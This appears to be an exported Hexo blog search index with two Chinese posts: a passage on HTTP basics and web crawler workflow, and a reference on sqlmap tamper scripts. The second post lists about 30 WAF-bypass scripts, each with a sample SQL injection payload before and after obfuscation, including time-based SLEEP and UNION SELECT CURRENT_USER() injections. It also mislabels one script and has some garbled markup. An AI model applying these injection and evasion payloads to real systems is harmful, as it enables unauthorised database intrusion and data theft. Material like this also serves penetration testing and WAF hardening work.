src="https:////upload-images.jianshu.io/upload_images/2255795-76c4af1982a66838.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/773" alt="img"></p><p>  1-2.jpg</p><ul><li>请求体，一般承载的内容是POST请求中的表单数据，而对于GET请求，请求体则为空。</li></ul><p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-569c648c2c6d1f89.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/819" alt="img"></p><p>  1-3.jpg</p><h3 id="响应"><a href="#响应" class="headerlink" title="响应"></a>响应</h3><p>响应由服务端返回给客户端，分为三部分：响应状态码、响应头、响应提</p><ul><li>响应状态码</li></ul><p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-5804a72cba62b6fd.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1000" alt="img"></p><p>  1-4.jpg</p><ul><li>响应头，包含了服务器对请求的应答信息，如Content-Type、Server、Set-Cookie等。</li></ul><p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-a61e4fb72096b27e.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1000" alt="img"></p><p>  1-4.jpg</p><ul><li>响应体，响应的正文数据都在响应体中，比如请求网页时他的响应体就是网页的HTML代码，请求一张图片时，它的响应体就是图片的二进制数据。我们做爬虫请求网页后，要解析的就是响应体</li></ul><h1 id="二、爬虫基本工作原理"><a href="#二、爬虫基本工作原理" class="headerlink" title="二、爬虫基本工作原理"></a>二、爬虫基本工作原理</h1><h3 id="爬虫基本类型"><a href="#爬虫基本类型" class="headerlink" title="爬虫基本类型"></a>爬虫基本类型</h3><ul><li>通用爬虫：是 捜索引擎抓取系统（Baidu、Google、Yahoo等）的重要组成部分。主要目的是将互联网上的网页下载到本地，形成一个互联网内容的镜像备份。</li><li>聚焦爬虫：是”面向特定主题需求”的一种网络爬虫程序，它与通用搜索引擎爬虫的区别在于， 聚焦爬虫在实施网页抓取时会对内容进行处理筛选，尽量保证只抓取与需求相关的网页信息。</li><li>增量式爬虫：增量式更新指的是在更新的时候只更新改变的地方，而未改变的地方则不更新。所以增量式爬虫技术在爬取网页的过程中，只爬取内容发生变化或是新产生的网页，对未发生内容变化的网页则不会爬取。</li></ul><h3 id="爬虫的基本工作流程（以通用爬虫为例）"><a href="#爬虫的基本工作流程（以通用爬虫为例）" class="headerlink" title="爬虫的基本工作流程（以通用爬虫为例）"></a>爬虫的基本工作流程（以通用爬虫为例）</h3><p><img src="https:////upload-images.jianshu.io/upload_images/2255795-cffe88e6b8b23391.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/265" alt="img"></p><p>​      1-7.png</p><h5 id="第一步：抓取网页"><a href="#第一步：抓取网页" class="headerlink" title="第一步：抓取网页"></a>第一步：抓取网页</h5><ul><li>首先选取一部分的种子URL，将这些URL放入待抓取URL队列；</li><li>取出待抓取URL，解析DNS得到主机的IP，并将URL对应的网页下载下来，存储进已下载网页库中，并且将这些URL放进已抓取URL队列。</li><li>分析已抓取URL队列中的URL，分析其中的其他URL，并且将URL放入待抓取URL队列，从而进入下一个循环</li></ul><h5 id="第二步：数据存储"><a href="#第二步：数据存储" class="headerlink" title="第二步：数据存储"></a>第二步：数据存储</h5><ul><li>搜索引擎通过爬虫爬取到的网页，将数据存入原始页面数据库。其中的页面数据与用户浏览器得到的HTML是完全一样的。</li><li>搜索引擎蜘蛛在抓取页面时，也做一定的重复内容检测，一旦遇到访问权重很低的网站上有大量抄袭、采集或者复制的内容，很可能就不再爬行。</li></ul><h5 id="第三步：预处理"><a href="#第三步：预处理" class="headerlink" title="第三步：预处理"></a>第三步：预处理</h5><ul><li>搜索引擎将爬虫抓取回来的页面，进行各种步骤的预处理，比如：提取文字、中文分词、消除噪音（比如版权声明文字、导航条、广告等……）、索引处理、链接关系计算、特殊文件处理….</li><li>除了HTML文件外，搜索引擎通常还能抓取和索引以文字为基础的多种文件类型，如 PDF、Word、WPS、XLS、PPT、TXT 文件等。我们在搜索结果中也经常会看到这些文件类型。</li><li>但搜索引擎还不能处理图片、视频、Flash 这类非文字内容，也不能执行脚本和程序。</li></ul><h5 id="第四步：操作数据，实现需求"><a href="#第四步：操作数据，实现需求" class="headerlink" title="第四步：操作数据，实现需求"></a>第四步：操作数据，实现需求</h5><p>比如获取京东某类商品的所有评论、购买用户的会员等级</p><h3 id="爬虫基本结构"><a href="#爬虫基本结构" class="headerlink" title="爬虫基本结构"></a>爬虫基本结构</h3><p><img src="https:////upload-images.jianshu.io/upload_images/2255795-f1dc7e8061ac95ed.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/813" alt="img"></p><p>1-6.jpg</p><h3 id="爬虫的抓取策略"><a href="#爬虫的抓取策略" class="headerlink" title="爬虫的抓取策略"></a>爬虫的抓取策略</h3><ul><li>深度优先遍历策略</li><li>广度优先遍历策略</li><li>方向链接策略</li><li>Partial PageRank 策略</li><li>OPIC策略</li></ul><h3 id="爬虫的更新策略"><a href="#爬虫的更新策略" class="headerlink" title="爬虫的更新策略"></a>爬虫的更新策略</h3><ul><li>历史参考策略</li><li>用户体验策略</li><li>聚类抽样策略</li></ul><h3 id="网页分析算法"><a href="#网页分析算法" class="headerlink" title="网页分析算法"></a>网页分析算法</h3><ul><li>基于用户行为的网页分析算法</li><li>基于网络拓扑的网页分析算法</li><li>基于网页内容的网页分析算法</li></ul>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>sqlmap使用记录--tamper</title>
      <link href="/Coderzgh.github.io/2019/04/01/sqlmap-tamper/"/>
      <url>/Coderzgh.github.io/2019/04/01/sqlmap-tamper/</url>
      
        <content type="html"><![CDATA[<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>     (adsbygoogle = window.adsbygoogle || []).push({          google_ad_client: "ca-pub-3405437608986450",          enable_page_level_ads: true     });</script><p>sqlmap在默认的的情况下除了使用char()函数防止出现单引号，没有对注入的数据进行修改，还可以使用–tamper参数对数据做修改来绕过waf等设备。</p><h4 id="0x01-命令如下"><a href="#0x01-命令如下" class="headerlink" title="0x01 命令如下"></a>0x01 命令如下</h4><pre class=" language-python"><code class="language-python"><span class="token number">1</span>  sqlmap <span class="token operator">-</span>u <span class="token punctuation">[</span>url<span class="token punctuation">]</span> <span class="token operator">-</span><span class="token operator">-</span>tamper <span class="token punctuation">[</span>模块名<span class="token punctuation">]</span></code></pre><p>sqlmap的绕过脚本在目录usr/share/golismero/tools/sqlmap/tamper下<br>目前sqlmap 1.2.9版本共有37个</p><p>可以使用–identify-waf对一些网站是否有安全防护进行试探</p><h4 id="0x02-常用tamper脚本"><a href="#0x02-常用tamper脚本" class="headerlink" title="0x02 常用tamper脚本"></a>0x02 常用tamper脚本</h4><p>apostrophemask.py</p><p>适用数据库：ALL<br>作用：将引号替换为utf-8，用于过滤单引号<br>使用脚本前：tamper(“1 AND ‘1’=’1”)<br>使用脚本后：1 AND %EF%BC%871%EF%BC%87=%EF%BC%871</p><p>base64encode.py</p><p>适用数据库：ALL<br>作用：替换为base64编码<br>使用脚本前：tamper(“1’ AND SLEEP(5)#”)<br>使用脚本后：MScgQU5EIFNMRUVQKDUpIw==</p><p>multiplespaces.py</p><p>适用数据库：ALL<br>作用：围绕sql关键字添加多个空格<br>使用脚本前：tamper(‘1 UNION SELECT foobar’)<br>使用脚本后：1 UNION SELECT foobar</p><p>space2plus.py</p><p>适用数据库：ALL<br>作用：用加号替换空格<br>使用脚本前：tamper(‘SELECT id FROM users’)<br>使用脚本后：SELECT+id+FROM+users</p><p>nonrecursivereplacement.py</p><p>适用数据库：ALL<br>作用：作为双重查询语句，用双重语句替代预定义的sql关键字（适用于非常弱的自定义过滤器，例如将select替换为空）<br>使用脚本前：tamper(‘1 UNION SELECT 2–’)<br>使用脚本后：1 UNIOUNIONN SELESELECTCT 2–</p><p>space2randomblank.py</p><p>适用数据库：ALL<br>作用：将空格替换为其他有效字符<br>使用脚本前：tamper(‘SELECT id FROM users’)<br>使用脚本后：SELECT%0Did%0DFROM%0Ausers</p><p>unionalltounion.py</p><p>适用数据库：ALL<br>作用：将union allselect 替换为unionselect<br>使用脚本前：tamper(‘-1 UNION ALL SELECT’)<br>使用脚本后：-1 UNION SELECT</p><p>securesphere.py</p><p>适用数据库：ALL<br>作用：追加特定的字符串<br>使用脚本前：tamper(‘1 AND 1=1’)<br>使用脚本后：1 AND 1=1 and ‘0having’=’0having’</p><p>space2dash.py</p><p>适用数据库：ALL<br>作用：将空格替换为–，并添加一个随机字符串和换行符<br>使用脚本前：tamper(‘1 AND 9227=9227’)<br>使用脚本后：1–nVNaVoPYeva%0AAND–ngNvzqu%0A9227=9227</p><p>space2mssqlblank.py</p><p>适用数据库：Microsoft SQL Server<br>测试通过数据库：Microsoft SQL Server 2000、Microsoft SQL Server 2005<br>作用：将空格随机替换为其他空格符号(‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)<br>使用脚本前：tamper(‘SELECT id FROM users’)<br>使用脚本后：SELECT%0Eid%0DFROM%07users</p><p>between.py</p><p>测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0<br>作用：用NOT BETWEEN 0 AND #替换&gt;<br>使用脚本前：tamper(‘1 AND A &gt; B–’)<br>使用脚本后：1 AND A NOT BETWEEN 0 AND B–</p><p>percentage.py</p><p>适用数据库：ASP<br>测试通过数据库：Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0<br>作用：在每个字符前添加一个%<br>使用脚本前：tamper(‘SELECT FIELD FROM TABLE’)<br>使用脚本后：%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E</p><p>sp_password.py</p><p>适用数据库：MSSQL<br>作用：从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password<br>使用脚本前：tamper(‘1 AND 9227=9227– ‘)<br>使用脚本后：1 AND 9227=9227– sp_password</p><p>charencode.py</p><p>测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0<br>作用：对给定的payload全部字符使用url编码（不处理已经编码的字符）<br>使用脚本前：tamper(‘SELECT FIELD FROM%20TABLE’)<br>使用脚本后：%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45</p><p>randomcase.py</p><p>测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0<br>作用：随机大小写<br>使用脚本前：tamper(‘INSERT’)<br>使用脚本后：INseRt</p><p>charunicodeencode.py</p><p>适用数据库：ASP、ASP.NET<br>测试通过数据库：Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3<br>作用：适用字符串的unicode编码<br>使用脚本前：tamper(‘SELECT FIELD%20FROM TABLE’)<br>使用脚本后：%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045</p><p>space2comment.py</p><p>测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0<br>作用：将空格替换为/<strong>/<br>使用脚本前：tamper(‘SELECT id FROM users’)<br>使用脚本后：SELECT/</strong>/id/<strong>/FROM/</strong>/users</p><p>equaltolike.py</p><p>测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5<br>作用：将=替换为LIKE<br>使用脚本前：tamper(‘SELECT <em> FROM users WHERE id=1’)<br>使用脚本后：SELECT </em> FROM users WHERE id LIKE 1</p><p>equaltolike.py</p><p>测试通过数据库：MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0<br>作用：将&gt;替换为GREATEST，绕过对&gt;的过滤<br>使用脚本前：tamper(‘1 AND A &gt; B’)<br>使用脚本后：1 AND GREATEST(A,B+1)=A</p><p>ifnull2ifisnull.py</p><p>适用数据库：MySQL、SQLite (possibly)、SAP MaxDB (possibly)<br>测试通过数据库：MySQL 5.0 and 5.5<br>作用：将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A)，绕过对IFNULL的过滤<br>使用脚本前：tamper(‘IFNULL(1, 2)’)<br>使用脚本后：IF(ISNULL(1),2,1)</p><p>modsecurityversioned.py</p><p>适用数据库：MySQL<br>测试通过数据库：MySQL 5.0<br>作用：过滤空格，使用mysql内联注释的方式进行注入<br>使用脚本前：tamper(‘1 AND 2&gt;1–’)<br>使用脚本后：1 /<em>!30874AND 2&gt;1</em>/–<br>space2mysqlblank.py</p><p>适用数据库：MySQL<br>测试通过数据库：MySQL 5.1<br>作用：将空格替换为其他空格符号(‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’)<br>使用脚本前：tamper(‘SELECT id FROM users’)<br>使用脚本后：SELECT%0Bid%0DFROM%0Cusers</p><p>modsecurityzeroversioned.py</p><p>适用数据库：MySQL<br>测试通过数据库：MySQL 5.0<br>作用：使用内联注释方式（/<em>!00000</em>/）进行注入<br>使用脚本前：tamper(‘1 AND 2&gt;1–’)<br>使用脚本后：1 /<em>!00000AND 2&gt;1</em>/–</p><p>space2mysqldash.py</p><p>适用数据库：MySQL、MSSQL<br>作用：将空格替换为 – ，并追随一个换行符<br>使用脚本前：tamper(‘1 AND 9227=9227’)<br>使用脚本后：1–%0AAND–%0A9227=9227</p><p>bluecoat.py</p><p>适用数据库：Blue Coat SGOS<br>测试通过数据库：MySQL 5.1,、SGOS<br>作用：在sql语句之后用有效的随机空白字符替换空格符，随后用LIKE替换=<br>使用脚本前：tamper(‘SELECT id FROM users where id = 1’)<br>使用脚本后：SELECT%09id FROM users where id LIKE 1</p><p>versionedkeywords.py</p><p>适用数据库：MySQL<br>测试通过数据库：MySQL 4.0.18, 5.1.56, 5.5.11<br>作用：注释绕过<br>使用脚本前：tamper(‘1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#’)<br>使用脚本后：1/<em>!UNION</em>//<em>!ALL</em>//<em>!SELECT</em>//<em>!NULL</em>/,/<em>!NULL</em>/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/<em>!AS</em>//<em>!CHAR</em>/),CHAR(32)),CHAR(58,100,114,117,58))#</p><p>halfversionedmorekeywords.py</p><p>适用数据库：MySQL &lt; 5.1<br>测试通过数据库：MySQL 4.0.18/5.0.22<br>作用：在每个关键字前添加mysql版本注释<br>使用脚本前：tamper(“value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=’QDWa”)<br>使用脚本后：value’/<em>!0UNION/</em>!0ALL/<em>!0SELECT/</em>!0CONCAT(/<em>!0CHAR(58,107,112,113,58),/</em>!0IFNULL(CAST(/<em>!0CURRENT_USER()/</em>!0AS/<em>!0CHAR),/</em>!0CHAR(32)),/<em>!0CHAR(58,97,110,121,58)),/</em>!0NULL,/<em>!0NULL#/</em>!0AND ‘QDWa’=’QDWa</p><p>space2morehash.py</p><p>适用数据库：MySQL &gt;= 5.1.13<br>测试通过数据库：MySQL 5.1.41<br>作用：将空格替换为#，并添加一个随机字符串和换行符<br>使用脚本前：tamper(‘1 AND 9227=9227’)<br>使用脚本后：1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227</p><p>apostrophenullencode.py</p><p>适用数据库：ALL<br>作用：用非法双字节Unicode字符替换单引号<br>使用脚本前：tamper(“1 AND ‘1’=’1”)<br>使用脚本后：1 AND %00%271%00%27=%00%271</p><p>appendnullbyte.py</p><p>适用数据库：ALL<br>作用：在有效载荷的结束位置加载null字节字符编码<br>使用脚本前：tamper(‘1 AND 1=1’)<br>使用脚本后：1 AND 1=1%00</p><p>chardoubleencode.py</p><p>适用数据库：ALL<br>作用：对给定的payload全部字符使用双重url编码（不处理已经编码的字符）<br>使用脚本前：tamper(‘SELECT FIELD FROM%20TABLE’)<br>使用脚本后：%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545</p><p>unmagicquotes.py</p><p>适用数据库：ALL<br>作用：用一个多字节组合%bf%27和末尾通用注释一起替换空格<br>使用脚本前：tamper(“1’ AND 1=1”)<br>使用脚本后：1%bf%27 AND 1=1–</p><p>randomcomments.py</p><p>适用数据库：ALL<br>作用：用注释符分割sql关键字<br>使用脚本前：tamper(‘INSERT’)<br>使用脚本后：I/<strong>/N/</strong>/SERT</p><h4 id="0x03-附录："><a href="#0x03-附录：" class="headerlink" title="0x03 附录："></a>0x03 附录：</h4><p><img src="https://img2018.cnblogs.com/blog/1358580/201906/1358580-20190605194338464-982309411.png" alt="img"></p><h4 id="0x04-在熟悉了tamper脚本之后，我们应该学习tamper绕过脚本的编写规则，来应对复杂的实际环境。"><a href="#0x04-在熟悉了tamper脚本之后，我们应该学习tamper绕过脚本的编写规则，来应对复杂的实际环境。" class="headerlink" title="0x04 在熟悉了tamper脚本之后，我们应该学习tamper绕过脚本的编写规则，来应对复杂的实际环境。"></a>0x04 在熟悉了tamper脚本之后，我们应该学习tamper绕过脚本的编写规则，来应对复杂的实际环境。</h4>]]></content>
      
      
      <categories>
          
          <category> sqlmap </category>
          
      </categories>
      
      
        <tags>
            
            <tag> sqlmap </tag>
            
        </tags>
      
    </entry>
    
    
  
  
</search>